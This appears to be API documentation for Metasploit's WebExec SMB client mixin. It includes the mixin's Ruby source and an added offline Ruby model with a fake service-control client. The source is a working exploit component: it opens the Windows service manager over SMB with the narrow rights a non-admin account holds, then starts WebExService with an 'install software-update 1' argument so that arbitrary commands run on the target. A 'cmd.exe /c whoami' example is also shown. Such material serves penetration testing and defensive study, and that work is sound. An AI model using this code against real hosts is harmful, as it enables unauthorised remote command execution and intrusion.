Module: Msf::Exploit::Remote::SMB::Client::WebExec

Includes:
Failure, DCERPC, Authenticated, Windows_Constants
Defined in:
lib/msf/core/exploit/smb/client/webexec.rb

Overview

Makes use of a WebEx service vulnerability that works similarly to psexec: a service that a non-admin account is allowed to start is made to run an attacker-chosen command.

This code was stolen straight out of the psexec module, which was stolen from the standalone Psexec tool. Thanks very much to all who contributed to that module! Instead of uploading and running a binary, this mixin starts the existing WebEx service (SERVICE_NAME, WebExService by default) with the argument vector install software-update 1 <command>, and the service runs the command; see #execute_single_command.

Constant Summary

Constants included from Msf::Exploit::Remote::SMB::Client

CONST, DCERPCClient, DCERPCPacket, DCERPCResponse, DCERPCUUID, NDR, SIMPLE, XCEPT

Constants included from DCERPC

DCERPC::DCERPCClient, DCERPC::DCERPCPacket, DCERPC::DCERPCResponse, DCERPC::DCERPCUUID, DCERPC::NDR

Constants included from DCERPC_LSA

DCERPC_LSA::NDR

Constants included from DCERPC_MGMT

DCERPC_MGMT::NDR

Constants included from Windows_Constants

Windows_Constants::CHANGE_SERVICE_CONFIG2_W, Windows_Constants::CHANGE_SERVICE_CONFIG_W, Windows_Constants::CLOSE_SERVICE_HANDLE, Windows_Constants::CONTROL_SERVICE, Windows_Constants::CREATE_SERVICE_W, Windows_Constants::DELETE_SERVICE, Windows_Constants::OPEN_SC_MANAGER_W, Windows_Constants::OPEN_SERVICE_W, Windows_Constants::QUERY_SERVICE_STATUS, Windows_Constants::SC_MANAGER_ALL_ACCESS, Windows_Constants::SC_MANAGER_CONNECT, Windows_Constants::SC_MANAGER_CREATE_SERVICE, Windows_Constants::SC_MANAGER_ENUMERATE_SERVICE, Windows_Constants::SC_MANAGER_LOCK, Windows_Constants::SC_MANAGER_MODIFY_BOOT_CONFIG, Windows_Constants::SC_MANAGER_QUERY_LOCK_STATUS, Windows_Constants::SERVICE_ACCEPT_HARDWAREPROFILECHANGE, Windows_Constants::SERVICE_ACCEPT_NETBINDCHANGE, Windows_Constants::SERVICE_ACCEPT_PARAMCHANGE, Windows_Constants::SERVICE_ACCEPT_PAUSE_CONTINUE, Windows_Constants::SERVICE_ACCEPT_POWEREVENT, Windows_Constants::SERVICE_ACCEPT_PRESHUTDOWN, Windows_Constants::SERVICE_ACCEPT_SESSIONCHANGE, Windows_Constants::SERVICE_ACCEPT_SHUTDOWN, Windows_Constants::SERVICE_ACCEPT_STOP, Windows_Constants::SERVICE_ACCEPT_TIMECHANGE, Windows_Constants::SERVICE_ACCEPT_TRIGGEREVENT, Windows_Constants::SERVICE_ACTIVE, Windows_Constants::SERVICE_ALL_ACCESS, Windows_Constants::SERVICE_AUTO_START, Windows_Constants::SERVICE_BOOT_START, Windows_Constants::SERVICE_CHANGE_CONFIG, Windows_Constants::SERVICE_CONFIG_DELAYED_AUTO_START_INFO, Windows_Constants::SERVICE_CONFIG_DESCRIPTION, Windows_Constants::SERVICE_CONFIG_FAILURE_ACTIONS, Windows_Constants::SERVICE_CONFIG_FAILURE_ACTIONS_FLAG, Windows_Constants::SERVICE_CONFIG_LAUNCH_PROTECTED, Windows_Constants::SERVICE_CONFIG_PREFERRED_NODE, Windows_Constants::SERVICE_CONFIG_PRESHUTDOWN_INFO, Windows_Constants::SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO, Windows_Constants::SERVICE_CONFIG_SERVICE_SID_INFO, Windows_Constants::SERVICE_CONFIG_TRIGGER_INFO, Windows_Constants::SERVICE_CONTINUE_PENDING, Windows_Constants::SERVICE_CONTROL_CONTINUE, 
Windows_Constants::SERVICE_CONTROL_DEVICEEVENT, Windows_Constants::SERVICE_CONTROL_HARDWAREPROFILECHANGE, Windows_Constants::SERVICE_CONTROL_INTERROGATE, Windows_Constants::SERVICE_CONTROL_NETBINDADD, Windows_Constants::SERVICE_CONTROL_NETBINDDISABLE, Windows_Constants::SERVICE_CONTROL_NETBINDENABLE, Windows_Constants::SERVICE_CONTROL_NETBINDREMOVE, Windows_Constants::SERVICE_CONTROL_PARAMCHANGE, Windows_Constants::SERVICE_CONTROL_PAUSE, Windows_Constants::SERVICE_CONTROL_POWEREVENT, Windows_Constants::SERVICE_CONTROL_PRESHUTDOWN, Windows_Constants::SERVICE_CONTROL_SESSIONCHANGE, Windows_Constants::SERVICE_CONTROL_SHUTDOWN, Windows_Constants::SERVICE_CONTROL_STOP, Windows_Constants::SERVICE_CONTROL_TIMECHANGE, Windows_Constants::SERVICE_CONTROL_TRIGGEREVENT, Windows_Constants::SERVICE_DEMAND_START, Windows_Constants::SERVICE_DISABLED, Windows_Constants::SERVICE_ENUMERATE_DEPENDENTS, Windows_Constants::SERVICE_ERROR_IGNORE, Windows_Constants::SERVICE_INACTIVE, Windows_Constants::SERVICE_INTERACTIVE_PROCESS, Windows_Constants::SERVICE_INTERROGATE, Windows_Constants::SERVICE_NO_CHANGE, Windows_Constants::SERVICE_PAUSED, Windows_Constants::SERVICE_PAUSE_CONTINUE, Windows_Constants::SERVICE_PAUSE_PENDING, Windows_Constants::SERVICE_QUERY_CONFIG, Windows_Constants::SERVICE_QUERY_STATUS, Windows_Constants::SERVICE_RUNNING, Windows_Constants::SERVICE_RUNS_IN_SYSTEM_PROCESS, Windows_Constants::SERVICE_START, Windows_Constants::SERVICE_START_PENDING, Windows_Constants::SERVICE_STATE_ALL, Windows_Constants::SERVICE_STOP, Windows_Constants::SERVICE_STOPPED, Windows_Constants::SERVICE_STOP_PENDING, Windows_Constants::SERVICE_SYSTEM_START, Windows_Constants::SERVICE_USER_DEFINED_CONTROL, Windows_Constants::SERVICE_WIN32_OWN_PROCESS, Windows_Constants::STANDARD_RIGHTS_REQUIRED

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::SMB::Client

#simple

Attributes included from Tcp

#sock

Attributes included from DCERPC

#dcerpc, #handle

Instance Method Summary

Methods included from Msf::Exploit::Remote::SMB::Client

#connect, #domain, #domain_username_split, #smb_create, #smb_direct, #smb_enumprinters, #smb_enumprintproviders, #smb_file_exist?, #smb_file_rm, #smb_fingerprint, #smb_fingerprint_windows_lang, #smb_fingerprint_windows_sp, #smb_hostname, #smb_lanman_netshareenumall, #smb_login, #smb_lookup_share_type, #smb_netshareenumall, #smb_netsharegetinfo, #smb_open, #smb_peer_lm, #smb_peer_os, #smb_srvsvc_netshareenumall, #smb_srvsvc_netsharegetinfo, #smbhost, #splitname, #unicode

Methods included from Tcp

#chost, #cleanup, #connect, #connect_timeout, #cport, #deregister_tcp_options, #disconnect, #handler, #lhost, #lport, #peer, #print_prefix, #proxies, #rhost, #rport, #set_tcp_evasions, #shutdown, #ssl, #ssl_cipher, #ssl_verify_mode, #ssl_version

Methods included from DCERPC

#dcerpc_bind, #dcerpc_call, #dcerpc_getarch, #dcerpc_handle, #unicode

Methods included from DCERPC_LSA

#lsa_open_policy

Methods included from DCERPC_MGMT

#dcerpc_mgmt_connect, #dcerpc_mgmt_inq_if_ids, #dcerpc_mgmt_inq_if_stats, #dcerpc_mgmt_inq_princ_name, #dcerpc_mgmt_is_server_listening, #dcerpc_mgmt_stop_server_listening

Methods included from DCERPC_EPM

#dcerpc_endpoint_find_tcp, #dcerpc_endpoint_find_udp, #dcerpc_endpoint_list

Instance Method Details

#execute_single_command(command, opts) ⇒ Object


# File 'lib/msf/core/exploit/smb/client/webexec.rb', line 39

def execute_single_command(command, opts)
  # StartServiceW takes an argument vector (one string per entry), so the
  # command is split on single spaces; an argument that itself contains
  # spaces is therefore delivered as several entries.
  command = command.split(/ /)
  # The fixed "install software-update 1" prefix selects the service's
  # software-update mode, which runs the remaining arguments as a command.
  svc_status = opts[:svc_client].startservice(opts[:svc_handle], ["install", "software-update", "1", *command])
  case svc_status
  when ERROR_SUCCESS
    # This happens a lot, so don't print it
    # print_good("Service started successfully...")
  when ERROR_FILE_NOT_FOUND
    print_error("Service failed to start - FILE_NOT_FOUND")
  when ERROR_ACCESS_DENIED
    print_error("Service failed to start - ACCESS_DENIED")
  when ERROR_SERVICE_REQUEST_TIMEOUT
    # Reported as good: the service ran the command instead of reporting
    # itself as running, so the SCM's start request times out.
    print_good("Service start timed out")
  else
    print_error("Service failed to start, ERROR_CODE: #{svc_status}")
  end
end

#initialize(info = {}) ⇒ Object


# File 'lib/msf/core/exploit/smb/client/webexec.rb', line 27

def initialize(info = {})
  super
  register_options(
    [
      # Name of the WebEx service to start; override it if the target
      # registered the service under a different name.
      OptString.new('SERVICE_NAME', [ false, 'The service name', 'WebExService']),
    ], self.class)

  # No advanced options are defined by this mixin.
  register_advanced_options(
    [
    ], self.class)
end

#wexec(disconnect = true) {|opts| ... } ⇒ Boolean

Connects to IPC$, binds to the svcctl interface, opens the Service Control Manager and the service named by SERVICE_NAME with the narrowest access masks a non-admin account is typically granted (SC_MANAGER_CONNECT and SERVICE_START), then yields a Hash holding the SVCCTL client and the service handle. The block is expected to run one or more Windows commands through the service, normally by calling #execute_single_command(command, opts) with that Hash. The service handle is closed when the block returns, even if it raises.

If you want to retrieve the output of your command you'll have to echo it to a .txt file and then read that file back over SMB (#smb_read_file, which the psexec mixin provides and this mixin does not include, does exactly that). Make sure to remove the files manually or use FileDropper#register_files_for_cleanup to have the FileDropper#cleanup and FileDropper#on_new_session handlers do it for you.

Parameters:

  • disconnect (Boolean) (defaults to: true)

    Disconnect from IPC$ afterwards

Yield Parameters:

  • opts (Hash)

    { :svc_client => Rex::Proto::DCERPC::SVCCTL::Client, :svc_handle => handle }; pass it to #execute_single_command

Returns:

  • (Boolean)

    true when both handles were obtained and the block ran; false if the Service Control Manager or the service could not be opened


# File 'lib/msf/core/exploit/smb/client/webexec.rb', line 69

def wexec(disconnect=true)
  # The svcctl named pipe is reached through the IPC$ share.
  simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
  # Service Control Manager Remote Protocol interface, v2.0, over named pipes.
  handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
  vprint_status("Binding to #{handle} ...")
  dcerpc_bind(handle)
  vprint_status("Bound to #{handle} ...")
  vprint_status("Obtaining a service manager handle...")

  svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc)
  # 0x00001 is SC_MANAGER_CONNECT. This is the only permission non-admin gets on Windows 7 (and likely others)
  scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST'], 0x00001)

  if scm_status == ERROR_ACCESS_DENIED
    print_error("ERROR_ACCESS_DENIED opening the Service Manager")
  end

  return false unless scm_handle

  # 0x00010 is SERVICE_START. These are the best permissions I could use for a non-admin account on Windows 7
  svc_handle = svc_client.openservicew(scm_handle, datastore['SERVICE_NAME'], 0x00010)

  if svc_handle.nil?
    print_error("No service handle retrieved")
    return false
  end

  vprint_status("Starting the service...")
  begin
    # The block is expected to call execute_single_command(command, opts).
    yield({ :svc_client => svc_client, :svc_handle => svc_handle })
  ensure
    # Runs even if the block raises. Note that the SCM handle is left open.
    vprint_status("Closing service handle...")
    svc_client.closehandle(svc_handle)
  end

  if disconnect
    simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
  end

  true
end
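As an added example, not code from the Metasploit mixin or its source, the following Ruby models the flow of #wexec and #execute_single_command above so the argument vector, the access masks and the status handling can be exercised offline. It uses a constructed in-memory stand-in for Rex::Proto::DCERPC::SVCCTL::Client (the class FakeSvcctlClient, the function run_via_service and the RHOST 192.0.2.10 are this example's own inventions) that behaves like a non-admin session: the Service Control Manager grants only SC_MANAGER_CONNECT and the service only SERVICE_START, so any wider request is refused. The constant values are the documented Windows ones.

```ruby
# Added example, not the mixin's code: an offline model of the #wexec /
# #execute_single_command flow with a constructed SVCCTL client stand-in.

# Windows access masks and Win32 status codes the mixin relies on.  The mixin
# passes the two masks as raw numbers (0x00001 and 0x00010).
SC_MANAGER_CONNECT            = 0x0001
SC_MANAGER_ALL_ACCESS         = 0xF003F
SERVICE_START                 = 0x0010
ERROR_SUCCESS                 = 0
ERROR_FILE_NOT_FOUND          = 2
ERROR_ACCESS_DENIED           = 5
ERROR_SERVICE_REQUEST_TIMEOUT = 1053

# Argument vector handed to StartServiceW, built the way execute_single_command
# builds it: a fixed "install software-update 1" prefix, then the command split
# on single spaces (an argument containing spaces becomes several entries).
def webexec_argv(command)
  ["install", "software-update", "1", *command.split(/ /)]
end

# Outcome of the StartServiceW status, mirroring execute_single_command's case
# statement.  A request timeout is the status the mixin reports with print_good.
def start_status_outcome(status)
  case status
  when ERROR_SUCCESS                 then :started
  when ERROR_FILE_NOT_FOUND          then :file_not_found
  when ERROR_ACCESS_DENIED           then :access_denied
  when ERROR_SERVICE_REQUEST_TIMEOUT then :timeout
  else :failed
  end
end

# Constructed stand-in for Rex::Proto::DCERPC::SVCCTL::Client (hypothetical
# class; same method names and return shapes the mixin expects).  It models a
# non-admin caller: the SCM grants only SC_MANAGER_CONNECT and the service only
# SERVICE_START, so a request for any wider mask is refused.
class FakeSvcctlClient
  attr_reader :start_calls, :open_handles

  def initialize(scm_granted: SC_MANAGER_CONNECT, svc_granted: SERVICE_START,
                 start_status: ERROR_SERVICE_REQUEST_TIMEOUT)
    @scm_granted  = scm_granted
    @svc_granted  = svc_granted
    @start_status = start_status
    @open_handles = {}   # handle => :scm or the service name
    @start_calls  = []   # argv vectors received by startservice
    @counter      = 0
  end

  # Returns [handle, status]; handle is nil when access is denied.
  def openscmanagerw(_rhost, access)
    return [nil, ERROR_ACCESS_DENIED] unless (access & ~@scm_granted).zero?
    [new_handle(:scm), ERROR_SUCCESS]
  end

  # Returns the service handle, or nil when access is denied.
  def openservicew(scm_handle, name, access)
    raise ArgumentError, "not an open SCM handle" unless @open_handles[scm_handle] == :scm
    return nil unless (access & ~@svc_granted).zero?
    new_handle(name)
  end

  def startservice(svc_handle, argv)
    raise ArgumentError, "not an open handle" unless @open_handles.key?(svc_handle)
    @start_calls << argv.dup
    @start_status
  end

  def closehandle(handle)
    @open_handles.delete(handle)
  end

  private

  def new_handle(kind)
    @counter += 1
    handle = "handle-#{@counter}"
    @open_handles[handle] = kind
    handle
  end
end

# Model of #wexec: open the SCM and the service with the narrowest masks, run
# one command with execute_single_command's argv, and close the handles whatever
# happens (the mixin's ensure block closes only the service handle; this model
# closes the SCM handle as well).  Returns [ok, outcome].
def run_via_service(client, rhost, service_name, command)
  scm_handle, _status = client.openscmanagerw(rhost, SC_MANAGER_CONNECT)
  return [false, :scm_denied] if scm_handle.nil?
  svc_handle = nil
  begin
    svc_handle = client.openservicew(scm_handle, service_name, SERVICE_START)
    return [false, :no_service_handle] if svc_handle.nil?
    [true, start_status_outcome(client.startservice(svc_handle, webexec_argv(command)))]
  ensure
    client.closehandle(svc_handle) if svc_handle
    client.closehandle(scm_handle)
  end
end

if __FILE__ == $PROGRAM_NAME
  client = FakeSvcctlClient.new
  p run_via_service(client, "192.0.2.10", "WebExService", "cmd.exe /c whoami")
  p client.start_calls
end
```

The stand-in's access check is the point of the model: asking for SC_MANAGER_ALL_ACCESS or SERVICE_ALL_ACCESS, as a generic service-control client might, fails for the non-admin caller, while the two narrow masks the mixin hard-codes succeed. A real run replaces FakeSvcctlClient with the Rex client constructed from the bound DCERPC handle, as #wexec does.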